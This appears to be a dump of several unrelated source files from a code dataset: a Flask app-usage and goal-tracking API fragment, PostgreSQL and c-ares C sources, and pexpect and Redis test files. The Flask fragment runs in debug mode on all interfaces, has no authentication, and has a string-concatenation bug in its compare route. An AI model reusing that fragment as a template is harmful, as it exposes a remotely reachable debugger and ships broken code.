if userid in db:
doc = db.get(userid)
doc['Appdata'] = appTotal(doc['Appdata'])
db[userid] = doc
return json.dumps(db.get(userid)) + "\n"
else:
return "User not in database"
@app.route('/getapps/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/get/<userid>/
def getApps(userid):
if userid in db:
doc = db.get(userid)
doc['Appdata'] = appTotal(doc['Appdata'])
db[userid] = doc
return json.dumps(db.get(userid)['Appdata']) + "\n"
else:
return "User not in database"
@app.route('/newuser/<string:userid>/', methods = ['PUT'])
#curl -X PUT http://localhost:5000/newuser/<userid>/
def newUser(userid):
if userid in db:
return userid + " already in db!" + "\n"
db[userid] = {'userid': userid, 'Appdata': {'Total': Weekly}, 'Goals': Goals}
if userid in db:
return "Successfully inserted " + userid + "\n"
else:
return "Failed to insert"
@app.route('/app/<string:userid>/<string:app>/', methods = ['PUT','DELETE'])
def App(userid,app):
doc = db.get(userid)
if request.method == "PUT":
#curl -X PUT http://localhost:5000/app/<userid>/<app>/
if app in doc['Appdata']:
return app + " already in Appdata" + "\n"
else:
doc['Appdata'][app] = Weekly
db[userid] = doc
return "Successfully inserted " + app + "\n"
elif request.method == "DELETE":
#curl -X DELETE http://localhost:5000/app/<userid>/<app>/
if app in doc['Appdata']:
del doc['Appdata'][app]
db[userid] = doc
return "Successfully deleted " + app + "\n"
else:
return app + " not in Appdata" + "\n"
@app.route('/getgoal/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/getgoal/<userid>/
def getGoal(userid):
doc = db.get(userid)
return "Daily Goal is : " + str(doc['Goals']['Daily']) + "\n" + "Weekly Goal is : " + str(doc['Goals']['Weekly']) + "\n"
@app.route('/newgoal/<string:userid>/<int:daily>/<int:weekly>/', methods = ['PUT'])
#curl -X PUT http://localhost:5000/newgoal/<userid>/<daily>/<weekly>/
def newGoal(userid,daily,weekly):
doc = db.get(userid)
doc['Goals']['Daily'] = daily
doc['Goals']['Weekly'] = weekly
db[userid] = doc
return "New Daily is: " + str(daily) + "\n" + "New Weekly is: " + str(weekly) + "\n"
@app.route('/compare/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/compare/<userid>
def checker(userid):
#https://www.tutorialspoint.com/python/time_strftime.htm
now = datetime.datetime.now()
day = now.strftime("%a") #gives current day of week abbrev
doc = db.get(userid)
data = doc['Appdata']['Total']
w_excess = data['Tot'] - doc['Goals']['Weekly']
today_index = dayToIndex(day)
d_excess = data[today_index] - doc['Goals']['Daily']
if w_excess > 0 and d_excess > 0:
return "Weekly limit exceeded by " + str(w_excess) + "\n" + \
"Daily limit exceeded by " + (d_excess) + "\n"
elif d_excess > 0:
return "Daily limit exceeded by " + (d_excess) + "\n"
elif w_excess > 0:
return "Weekly limit exceeded by " + str(w_excess) + "\n"
else:
return "Daily Time = " + str(data[today_index]) + "\n" + \
"Weekly Time = " + str(data['Tot']) + "\n" + \
"No goals exceeded! Good job not procrastinating!" + "\n"
@app.route('/usage/<string:userid>/', methods = ['PUT'])
# curl -H "Content-type: application/json" -X PUT http://127.0.0.1:5000/usage/Byron/ -d '{"Instagram": 5}'
def takeJson(userid):
now = datetime.datetime.now()
day = now.strftime("%a") #gives current day of week abbrev
today_index = dayToIndex(day) #converts to day of week as referenced in the database
doc = db.get(userid)
jdata = json.loads(request.data) #converts the incoming json request to a json dictionary
for app in jdata:
if app not in doc: #if not in 'Appdata', then insert the app by calling the App function before updating usage in database
App(userid,app)
doc = db.get(userid) #have to update doc in this case
index = str(app)
doc['Appdata'][index][today_index] = jdata[index]
db[userid] = doc
return "Hello " + str(jdata) + "\n" #confimation that the json data was received
if __name__ == '__main__':
app.debug = True
app.run(host='0.0.0.0') | unknown | codeparrot/codeparrot-clean | ||
/*
* rmgrdesc.c
*
* pg_waldump resource managers definition
*
* src/bin/pg_waldump/rmgrdesc.c
*/
#define FRONTEND 1
#include "postgres.h"
#include "access/brin_xlog.h"
#include "access/clog.h"
#include "access/commit_ts.h"
#include "access/generic_xlog.h"
#include "access/ginxlog.h"
#include "access/gistxlog.h"
#include "access/hash_xlog.h"
#include "access/heapam_xlog.h"
#include "access/multixact.h"
#include "access/nbtxlog.h"
#include "access/rmgr.h"
#include "access/spgxlog.h"
#include "access/xact.h"
#include "access/xlog_internal.h"
#include "catalog/storage_xlog.h"
#include "commands/dbcommands_xlog.h"
#include "commands/sequence_xlog.h"
#include "commands/tablespace.h"
#include "replication/message.h"
#include "replication/origin.h"
#include "rmgrdesc.h"
#include "storage/standbydefs.h"
#include "utils/relmapper.h"
#define PG_RMGR(symname,name,redo,desc,identify,startup,cleanup,mask,decode) \
{ name, desc, identify},
static const RmgrDescData RmgrDescTable[RM_N_BUILTIN_IDS] = {
#include "access/rmgrlist.h"
};
#define CUSTOM_NUMERIC_NAME_LEN sizeof("custom###")
static char CustomNumericNames[RM_N_CUSTOM_IDS][CUSTOM_NUMERIC_NAME_LEN] = {0};
static RmgrDescData CustomRmgrDesc[RM_N_CUSTOM_IDS] = {0};
static bool CustomRmgrDescInitialized = false;
/*
* No information on custom resource managers; just print the ID.
*/
static void
default_desc(StringInfo buf, XLogReaderState *record)
{
appendStringInfo(buf, "rmid: %d", XLogRecGetRmid(record));
}
/*
* No information on custom resource managers; just return NULL and let the
* caller handle it.
*/
static const char *
default_identify(uint8 info)
{
return NULL;
}
/*
* We are unable to get the real name of a custom rmgr because the module is
* not loaded. Generate a table of rmgrs with numeric names of the form
* "custom###", where "###" is the 3-digit resource manager ID.
*/
static void
initialize_custom_rmgrs(void)
{
for (int i = 0; i < RM_N_CUSTOM_IDS; i++)
{
snprintf(CustomNumericNames[i], CUSTOM_NUMERIC_NAME_LEN,
"custom%03d", i + RM_MIN_CUSTOM_ID);
CustomRmgrDesc[i].rm_name = CustomNumericNames[i];
CustomRmgrDesc[i].rm_desc = default_desc;
CustomRmgrDesc[i].rm_identify = default_identify;
}
CustomRmgrDescInitialized = true;
}
const RmgrDescData *
GetRmgrDesc(RmgrId rmid)
{
Assert(RmgrIdIsValid(rmid));
if (RmgrIdIsBuiltin(rmid))
return &RmgrDescTable[rmid];
else
{
if (!CustomRmgrDescInitialized)
initialize_custom_rmgrs();
return &CustomRmgrDesc[rmid - RM_MIN_CUSTOM_ID];
}
} | c | github | https://github.com/postgres/postgres | src/bin/pg_waldump/rmgrdesc.c |
/* MIT License
*
* Copyright (c) 2024 Brad House
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*
* SPDX-License-Identifier: MIT
*/
#include "ares_private.h"
#include "ares_event.h"
#if defined(__ANDROID__) && defined(CARES_THREADS)
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
(void)configchg;
(void)e;
/* No ability */
return ARES_ENOTIMP;
}
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
/* No-op */
(void)configchg;
}
#elif defined(__linux__) && defined(CARES_THREADS)
# include <sys/inotify.h>
struct ares_event_configchg {
int inotify_fd;
ares_event_thread_t *e;
};
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
if (configchg == NULL) {
return; /* LCOV_EXCL_LINE: DefensiveCoding */
}
/* Tell event system to stop monitoring for changes. This will cause the
* cleanup to be called */
ares_event_update(NULL, configchg->e, ARES_EVENT_FLAG_NONE, NULL,
configchg->inotify_fd, NULL, NULL, NULL);
}
static void ares_event_configchg_free(void *data)
{
ares_event_configchg_t *configchg = data;
if (configchg == NULL) {
return; /* LCOV_EXCL_LINE: DefensiveCoding */
}
if (configchg->inotify_fd >= 0) {
close(configchg->inotify_fd);
configchg->inotify_fd = -1;
}
ares_free(configchg);
}
static void ares_event_configchg_cb(ares_event_thread_t *e, ares_socket_t fd,
void *data, ares_event_flags_t flags)
{
const ares_event_configchg_t *configchg = data;
/* Some systems cannot read integer variables if they are not
* properly aligned. On other systems, incorrect alignment may
* decrease performance. Hence, the buffer used for reading from
* the inotify file descriptor should have the same alignment as
* struct inotify_event. */
unsigned char buf[4096]
__attribute__((aligned(__alignof__(struct inotify_event))));
const struct inotify_event *event;
ssize_t len;
ares_bool_t triggered = ARES_FALSE;
(void)fd;
(void)flags;
while (1) {
const unsigned char *ptr;
len = read(configchg->inotify_fd, buf, sizeof(buf));
if (len <= 0) {
break;
}
/* Loop over all events in the buffer. Says kernel will check the buffer
* size provided, so I assume it won't ever return partial events. */
for (ptr = buf; ptr < buf + len;
ptr += sizeof(struct inotify_event) + event->len) {
event = (const struct inotify_event *)((const void *)ptr);
if (event->len == 0 || ares_strlen(event->name) == 0) {
continue;
}
if (ares_strcaseeq(event->name, "resolv.conf") ||
ares_strcaseeq(event->name, "nsswitch.conf")) {
triggered = ARES_TRUE;
}
}
}
/* Only process after all events are read. No need to process more often as
* we don't want to reload the config back to back */
if (triggered) {
ares_reinit(e->channel);
}
}
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
ares_status_t status = ARES_SUCCESS;
ares_event_configchg_t *c;
(void)e;
/* Not used by this implementation */
*configchg = NULL;
c = ares_malloc_zero(sizeof(*c));
if (c == NULL) {
return ARES_ENOMEM; /* LCOV_EXCL_LINE: OutOfMemory */
}
c->e = e;
c->inotify_fd = inotify_init1(IN_NONBLOCK | IN_CLOEXEC);
if (c->inotify_fd == -1) {
status = ARES_ESERVFAIL; /* LCOV_EXCL_LINE: UntestablePath */
goto done; /* LCOV_EXCL_LINE: UntestablePath */
}
/* We need to monitor /etc/resolv.conf, /etc/nsswitch.conf */
if (inotify_add_watch(c->inotify_fd, "/etc",
IN_CREATE | IN_MODIFY | IN_MOVED_TO | IN_ONLYDIR) ==
-1) {
status = ARES_ESERVFAIL; /* LCOV_EXCL_LINE: UntestablePath */
goto done; /* LCOV_EXCL_LINE: UntestablePath */
}
status =
ares_event_update(NULL, e, ARES_EVENT_FLAG_READ, ares_event_configchg_cb,
c->inotify_fd, c, ares_event_configchg_free, NULL);
done:
if (status != ARES_SUCCESS) {
ares_event_configchg_free(c);
} else {
*configchg = c;
}
return status;
}
#elif defined(USE_WINSOCK) && defined(CARES_THREADS)
# include <winsock2.h>
# include <iphlpapi.h>
# include <stdio.h>
# include <windows.h>
struct ares_event_configchg {
HANDLE ifchg_hnd;
HKEY regip4;
HANDLE regip4_event;
HANDLE regip4_wait;
HKEY regip6;
HANDLE regip6_event;
HANDLE regip6_wait;
ares_event_thread_t *e;
};
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
if (configchg == NULL) {
return;
}
# ifdef HAVE_NOTIFYIPINTERFACECHANGE
if (configchg->ifchg_hnd != NULL) {
CancelMibChangeNotify2(configchg->ifchg_hnd);
configchg->ifchg_hnd = NULL;
}
# endif
# ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
if (configchg->regip4_wait != NULL) {
UnregisterWait(configchg->regip4_wait);
configchg->regip4_wait = NULL;
}
if (configchg->regip6_wait != NULL) {
UnregisterWait(configchg->regip6_wait);
configchg->regip6_wait = NULL;
}
if (configchg->regip4 != NULL) {
RegCloseKey(configchg->regip4);
configchg->regip4 = NULL;
}
if (configchg->regip6 != NULL) {
RegCloseKey(configchg->regip6);
configchg->regip6 = NULL;
}
if (configchg->regip4_event != NULL) {
CloseHandle(configchg->regip4_event);
configchg->regip4_event = NULL;
}
if (configchg->regip6_event != NULL) {
CloseHandle(configchg->regip6_event);
configchg->regip6_event = NULL;
}
# endif
ares_free(configchg);
}
# ifdef HAVE_NOTIFYIPINTERFACECHANGE
static void NETIOAPI_API_
ares_event_configchg_ip_cb(PVOID CallerContext, PMIB_IPINTERFACE_ROW Row,
MIB_NOTIFICATION_TYPE NotificationType)
{
ares_event_configchg_t *configchg = CallerContext;
(void)Row;
(void)NotificationType;
ares_reinit(configchg->e->channel);
}
# endif
static ares_bool_t
ares_event_configchg_regnotify(ares_event_configchg_t *configchg)
{
# ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
# if defined(__WATCOMC__) && !defined(REG_NOTIFY_THREAD_AGNOSTIC)
# define REG_NOTIFY_THREAD_AGNOSTIC 0x10000000L
# endif
DWORD flags = REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET |
REG_NOTIFY_THREAD_AGNOSTIC;
if (RegNotifyChangeKeyValue(configchg->regip4, TRUE, flags,
configchg->regip4_event, TRUE) != ERROR_SUCCESS) {
return ARES_FALSE;
}
if (RegNotifyChangeKeyValue(configchg->regip6, TRUE, flags,
configchg->regip6_event, TRUE) != ERROR_SUCCESS) {
return ARES_FALSE;
}
# else
(void)configchg;
# endif
return ARES_TRUE;
}
static VOID CALLBACK ares_event_configchg_reg_cb(PVOID lpParameter,
BOOLEAN TimerOrWaitFired)
{
ares_event_configchg_t *configchg = lpParameter;
(void)TimerOrWaitFired;
ares_reinit(configchg->e->channel);
/* Re-arm, as its single-shot. However, we don't know which one needs to
* be re-armed, so we just do both */
ares_event_configchg_regnotify(configchg);
}
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
ares_status_t status = ARES_SUCCESS;
ares_event_configchg_t *c = NULL;
c = ares_malloc_zero(sizeof(**configchg));
if (c == NULL) {
return ARES_ENOMEM;
}
c->e = e;
# ifdef HAVE_NOTIFYIPINTERFACECHANGE
/* NOTE: If a user goes into the control panel and changes the network
* adapter DNS addresses manually, this will NOT trigger a notification.
* We've also tried listening on NotifyUnicastIpAddressChange(), but
* that didn't get triggered either.
*/
if (NotifyIpInterfaceChange(AF_UNSPEC, ares_event_configchg_ip_cb, c, FALSE,
&c->ifchg_hnd) != NO_ERROR) {
status = ARES_ESERVFAIL;
goto done;
}
# endif
# ifdef HAVE_REGISTERWAITFORSINGLEOBJECT
/* Monitor HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces
* and HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
* for changes via RegNotifyChangeKeyValue() */
if (RegOpenKeyExW(
HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces",
0, KEY_NOTIFY, &c->regip4) != ERROR_SUCCESS) {
status = ARES_ESERVFAIL;
goto done;
}
if (RegOpenKeyExW(
HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces",
0, KEY_NOTIFY, &c->regip6) != ERROR_SUCCESS) {
status = ARES_ESERVFAIL;
goto done;
}
c->regip4_event = CreateEvent(NULL, TRUE, FALSE, NULL);
if (c->regip4_event == NULL) {
status = ARES_ESERVFAIL;
goto done;
}
c->regip6_event = CreateEvent(NULL, TRUE, FALSE, NULL);
if (c->regip6_event == NULL) {
status = ARES_ESERVFAIL;
goto done;
}
if (!RegisterWaitForSingleObject(&c->regip4_wait, c->regip4_event,
ares_event_configchg_reg_cb, c, INFINITE,
WT_EXECUTEDEFAULT)) {
status = ARES_ESERVFAIL;
goto done;
}
if (!RegisterWaitForSingleObject(&c->regip6_wait, c->regip6_event,
ares_event_configchg_reg_cb, c, INFINITE,
WT_EXECUTEDEFAULT)) {
status = ARES_ESERVFAIL;
goto done;
}
# endif
if (!ares_event_configchg_regnotify(c)) {
status = ARES_ESERVFAIL;
goto done;
}
done:
if (status != ARES_SUCCESS) {
ares_event_configchg_destroy(c);
} else {
*configchg = c;
}
return status;
}
#elif defined(__APPLE__) && defined(CARES_THREADS)
# include <sys/types.h>
# include <unistd.h>
# include <stdbool.h>
# include <notify.h>
# include <dlfcn.h>
# include <fcntl.h>
struct ares_event_configchg {
int fd;
int token;
};
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
(void)configchg;
/* Cleanup happens automatically */
}
static void ares_event_configchg_free(void *data)
{
ares_event_configchg_t *configchg = data;
if (configchg == NULL) {
return;
}
if (configchg->fd >= 0) {
notify_cancel(configchg->token);
/* automatically closes fd */
configchg->fd = -1;
}
ares_free(configchg);
}
static void ares_event_configchg_cb(ares_event_thread_t *e, ares_socket_t fd,
void *data, ares_event_flags_t flags)
{
ares_event_configchg_t *configchg = data;
ares_bool_t triggered = ARES_FALSE;
(void)fd;
(void)flags;
while (1) {
int t = 0;
ssize_t len;
len = read(configchg->fd, &t, sizeof(t));
if (len < (ssize_t)sizeof(t)) {
break;
}
/* Token is read in network byte order (yeah, docs don't mention this) */
t = (int)ntohl(t);
if (t != configchg->token) {
continue;
}
triggered = ARES_TRUE;
}
/* Only process after all events are read. No need to process more often as
* we don't want to reload the config back to back */
if (triggered) {
ares_reinit(e->channel);
}
}
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
ares_status_t status = ARES_SUCCESS;
void *handle = NULL;
const char *(*pdns_configuration_notify_key)(void) = NULL;
const char *notify_key = NULL;
int flags;
size_t i;
const char *searchlibs[] = {
"/usr/lib/libSystem.dylib",
"/System/Library/Frameworks/SystemConfiguration.framework/"
"SystemConfiguration",
NULL
};
*configchg = ares_malloc_zero(sizeof(**configchg));
if (*configchg == NULL) {
return ARES_ENOMEM;
}
/* Load symbol as it isn't normally public */
for (i = 0; searchlibs[i] != NULL; i++) {
handle = dlopen(searchlibs[i], RTLD_LAZY);
if (handle == NULL) {
/* Fail, loop! */
continue;
}
pdns_configuration_notify_key =
(const char *(*)(void))dlsym(handle, "dns_configuration_notify_key");
if (pdns_configuration_notify_key != NULL) {
break;
}
/* Fail, loop! */
dlclose(handle);
handle = NULL;
}
if (pdns_configuration_notify_key == NULL) {
status = ARES_ESERVFAIL;
goto done;
}
notify_key = pdns_configuration_notify_key();
if (notify_key == NULL) {
status = ARES_ESERVFAIL;
goto done;
}
if (notify_register_file_descriptor(notify_key, &(*configchg)->fd, 0,
&(*configchg)->token) !=
NOTIFY_STATUS_OK) {
status = ARES_ESERVFAIL;
goto done;
}
/* Set file descriptor to non-blocking */
flags = fcntl((*configchg)->fd, F_GETFL, 0);
fcntl((*configchg)->fd, F_SETFL, flags | O_NONBLOCK);
/* Register file descriptor with event subsystem */
status = ares_event_update(NULL, e, ARES_EVENT_FLAG_READ,
ares_event_configchg_cb, (*configchg)->fd,
*configchg, ares_event_configchg_free, NULL);
done:
if (status != ARES_SUCCESS) {
ares_event_configchg_free(*configchg);
*configchg = NULL;
}
if (handle) {
dlclose(handle);
}
return status;
}
#elif defined(HAVE_STAT) && !defined(_WIN32) && defined(CARES_THREADS)
# ifdef HAVE_SYS_TYPES_H
# include <sys/types.h>
# endif
# ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
# endif
typedef struct {
size_t size;
time_t mtime;
} fileinfo_t;
struct ares_event_configchg {
ares_bool_t isup;
ares_thread_t *thread;
ares_htable_strvp_t *filestat;
ares_thread_mutex_t *lock;
ares_thread_cond_t *wake;
const char *resolvconf_path;
ares_event_thread_t *e;
};
static ares_status_t config_change_check(ares_htable_strvp_t *filestat,
const char *resolvconf_path)
{
size_t i;
const char *configfiles[16];
ares_bool_t changed = ARES_FALSE;
size_t cnt = 0;
memset(configfiles, 0, sizeof(configfiles));
configfiles[cnt++] = resolvconf_path;
configfiles[cnt++] = "/etc/nsswitch.conf";
#ifdef _AIX
configfiles[cnt++] = "/etc/netsvc.conf";
#endif
#ifdef __osf /* Tru64 */
configfiles[cnt++] = "/etc/svc.conf";
#endif
#ifdef __QNX__
configfiles[cnt++] = "/etc/net.cfg";
#endif
configfiles[cnt++] = NULL;
for (i = 0; configfiles[i] != NULL; i++) {
fileinfo_t *fi = ares_htable_strvp_get_direct(filestat, configfiles[i]);
struct stat st;
if (stat(configfiles[i], &st) == 0) {
if (fi == NULL) {
fi = ares_malloc_zero(sizeof(*fi));
if (fi == NULL) {
return ARES_ENOMEM;
}
if (!ares_htable_strvp_insert(filestat, configfiles[i], fi)) {
ares_free(fi);
return ARES_ENOMEM;
}
}
if (fi->size != (size_t)st.st_size || fi->mtime != (time_t)st.st_mtime) {
changed = ARES_TRUE;
}
fi->size = (size_t)st.st_size;
fi->mtime = (time_t)st.st_mtime;
} else if (fi != NULL) {
/* File no longer exists, remove */
ares_htable_strvp_remove(filestat, configfiles[i]);
changed = ARES_TRUE;
}
}
if (changed) {
return ARES_SUCCESS;
}
return ARES_ENOTFOUND;
}
static void *ares_event_configchg_thread(void *arg)
{
ares_event_configchg_t *c = arg;
ares_thread_mutex_lock(c->lock);
while (c->isup) {
ares_status_t status;
if (ares_thread_cond_timedwait(c->wake, c->lock, 30000) != ARES_ETIMEOUT) {
continue;
}
/* make sure status didn't change even though we got a timeout */
if (!c->isup) {
break;
}
status = config_change_check(c->filestat, c->resolvconf_path);
if (status == ARES_SUCCESS) {
ares_reinit(c->e->channel);
}
}
ares_thread_mutex_unlock(c->lock);
return NULL;
}
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
ares_status_t status = ARES_SUCCESS;
ares_event_configchg_t *c = NULL;
*configchg = NULL;
c = ares_malloc_zero(sizeof(*c));
if (c == NULL) {
status = ARES_ENOMEM;
goto done;
}
c->e = e;
c->filestat = ares_htable_strvp_create(ares_free);
if (c->filestat == NULL) {
status = ARES_ENOMEM;
goto done;
}
c->wake = ares_thread_cond_create();
if (c->wake == NULL) {
status = ARES_ENOMEM;
goto done;
}
c->lock = ares_thread_mutex_create();
if (c->lock == NULL) {
status = ARES_ENOMEM;
goto done;
}
c->resolvconf_path = c->e->channel->resolvconf_path;
if (c->resolvconf_path == NULL) {
c->resolvconf_path = PATH_RESOLV_CONF;
}
status = config_change_check(c->filestat, c->resolvconf_path);
if (status == ARES_ENOMEM) {
goto done;
}
c->isup = ARES_TRUE;
status = ares_thread_create(&c->thread, ares_event_configchg_thread, c);
done:
if (status != ARES_SUCCESS) {
ares_event_configchg_destroy(c);
} else {
*configchg = c;
}
return status;
}
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
if (configchg == NULL) {
return;
}
if (configchg->lock) {
ares_thread_mutex_lock(configchg->lock);
}
configchg->isup = ARES_FALSE;
if (configchg->wake) {
ares_thread_cond_signal(configchg->wake);
}
if (configchg->lock) {
ares_thread_mutex_unlock(configchg->lock);
}
if (configchg->thread) {
void *rv = NULL;
ares_thread_join(configchg->thread, &rv);
}
ares_thread_mutex_destroy(configchg->lock);
ares_thread_cond_destroy(configchg->wake);
ares_htable_strvp_destroy(configchg->filestat);
ares_free(configchg);
}
#else
ares_status_t ares_event_configchg_init(ares_event_configchg_t **configchg,
ares_event_thread_t *e)
{
(void)configchg;
(void)e;
/* No ability */
return ARES_ENOTIMP;
}
void ares_event_configchg_destroy(ares_event_configchg_t *configchg)
{
/* No-op */
(void)configchg;
}
#endif | c | github | https://github.com/nodejs/node | deps/cares/src/lib/event/ares_event_configchg.c |
#!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2016, Martin Packman <martin.packman@canonical.com>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import contextlib
import os
import tempfile
import unittest
import pexpect
from . import PexpectTestCase
@contextlib.contextmanager
def example_script(name, output='success'):
" helper to create a temporary shell script that tests can run "
tempdir = tempfile.mkdtemp(prefix='tmp-pexpect-test')
try:
script_path = os.path.join(tempdir, name)
with open(script_path, 'w') as f:
f.write('#!/bin/sh\necho "%s"' % (output,))
try:
os.chmod(script_path, 0o755)
yield tempdir
finally:
os.remove(script_path)
finally:
os.rmdir(tempdir)
class TestCaseEnv(PexpectTestCase.PexpectTestCase):
" tests for the env argument to pexpect.spawn and pexpect.run "
def test_run_uses_env(self):
" pexpect.run uses env argument when running child process "
script_name = 'run_uses_env.sh'
environ = {'PEXPECT_TEST_KEY': 'pexpect test value'}
with example_script(script_name, '$PEXPECT_TEST_KEY') as script_dir:
script = os.path.join(script_dir, script_name)
out = pexpect.run(script, env=environ)
self.assertEqual(out.rstrip(), b'pexpect test value')
def test_spawn_uses_env(self):
" pexpect.spawn uses env argument when running child process "
script_name = 'spawn_uses_env.sh'
environ = {'PEXPECT_TEST_KEY': 'pexpect test value'}
with example_script(script_name, '$PEXPECT_TEST_KEY') as script_dir:
script = os.path.join(script_dir, script_name)
child = pexpect.spawn(script, env=environ)
out = child.readline()
child.expect(pexpect.EOF)
self.assertEqual(child.exitstatus, 0)
self.assertEqual(out.rstrip(), b'pexpect test value')
def test_run_uses_env_path(self):
" pexpect.run uses binary from PATH when given in env argument "
script_name = 'run_uses_env_path.sh'
with example_script(script_name) as script_dir:
out = pexpect.run(script_name, env={'PATH': script_dir})
self.assertEqual(out.rstrip(), b'success')
def test_run_uses_env_path_over_path(self):
" pexpect.run uses PATH from env over os.environ "
script_name = 'run_uses_env_path_over_path.sh'
with example_script(script_name, output='failure') as wrong_dir:
with example_script(script_name) as right_dir:
orig_path = os.environ['PATH']
os.environ['PATH'] = wrong_dir
try:
out = pexpect.run(script_name, env={'PATH': right_dir})
finally:
os.environ['PATH'] = orig_path
self.assertEqual(out.rstrip(), b'success')
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
#
# This file is part of Scylla.
#
# Scylla is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Scylla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scylla. If not, see <http://www.gnu.org/licenses/>.
#
import pytest
import redis
import logging
from util import random_string, connect
logger = logging.getLogger('redis-test')
def test_hset_hget_delete(redis_host, redis_port):
r = connect(redis_host, redis_port)
key = random_string(10)
field = random_string(10)
val = random_string(10)
other_val = random_string(10)
try:
r.execute_command("HSET testkey")
raise Exception('Expect that `HSET testkey` does not work')
except redis.exceptions.ResponseError as ex:
assert str(ex) == "wrong number of arguments for 'hset' command"
try:
r.execute_command("HSET testkey testfield")
raise Exception('Expect that `HSET testkey testfield` does not work')
except redis.exceptions.ResponseError as ex:
assert str(ex) == "wrong number of arguments for 'hset' command"
assert r.hset(key, field, val) == 1
assert r.hget(key, field) == val
# Check overwrite
r.hset(key, field, other_val)
assert r.hget(key, field) == other_val
# Check delete
assert r.delete(key) == 1
assert r.hget(key, field) == None
@pytest.mark.xfail(reason="HSET command does not support multiple key/field")
def test_hset_multiple_key_field(redis_host, redis_port):
# This test requires the library to support multiple mappings in one
# command, or we cannot test this feature. This was added to redis-py
# in version 3.5.0, in April 29, 2020.
from distutils.version import LooseVersion
if LooseVersion(redis.__version__) < LooseVersion('3.5.0'):
pytest.skip('redis-py library too old to run this test')
r = connect(redis_host, redis_port)
key = random_string(10)
field = random_string(10)
val = random_string(10)
field2 = random_string(10)
val2 = random_string(10)
assert r.hset(key, None, None, {field: val, field2: val2}) == 2
@pytest.mark.xfail(reason="HSET command does not support return of changes, it always return 1")
def test_hset_return_changes(redis_host, redis_port):
r = connect(redis_host, redis_port)
key = random_string(10)
field = random_string(10)
val = random_string(10)
assert r.hset(key, field, val) == 1
assert r.hset(key, field, val) == 0
def test_hget_nonexistent_key(redis_host, redis_port):
r = connect(redis_host, redis_port)
key = random_string(10)
field = random_string(10)
assert r.hget(key, field) == None | unknown | codeparrot/codeparrot-clean | ||
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
